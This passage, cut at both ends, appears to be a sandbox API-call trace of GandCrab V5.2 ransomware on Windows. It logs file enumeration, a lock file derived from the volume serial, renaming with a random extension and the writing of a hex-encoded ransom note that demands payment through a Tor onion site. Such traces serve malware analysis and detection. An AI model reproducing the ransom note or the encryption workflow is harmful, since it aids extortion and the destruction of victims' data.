x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.270] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0072.271] CloseHandle (hObject=0x2c4) returned 1 [0072.271] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.271] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.272] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x24e)) [0072.272] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.272] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.272] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.273] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a09d2ca4deb61a.lock") returned 99 [0072.273] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0072.273] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.273] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 75 [0072.273] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0072.274] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503938 [0072.274] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.274] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.274] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.274] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.274] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.274] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.274] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.274] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a09d2ca4deb61a.lock" [0072.274] lstrlenW (lpString=".titwmvjl") returned 9 [0072.274] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a09d2ca4deb61a.lock") returned 99 [0072.274] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.275] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 108 [0072.275] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a09d2ca4deb61a.lock") returned 99 [0072.275] lstrlenW (lpString=".lock") returned 5 [0072.275] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.275] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.275] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.275] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.275] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.275] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0072.275] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0072.275] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0072.276] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0072.276] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.276] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.276] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.276] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.277] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.277] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.277] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.277] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\TITWMVJL-DECRYPT.txt") returned 100 [0072.277] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0072.278] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x3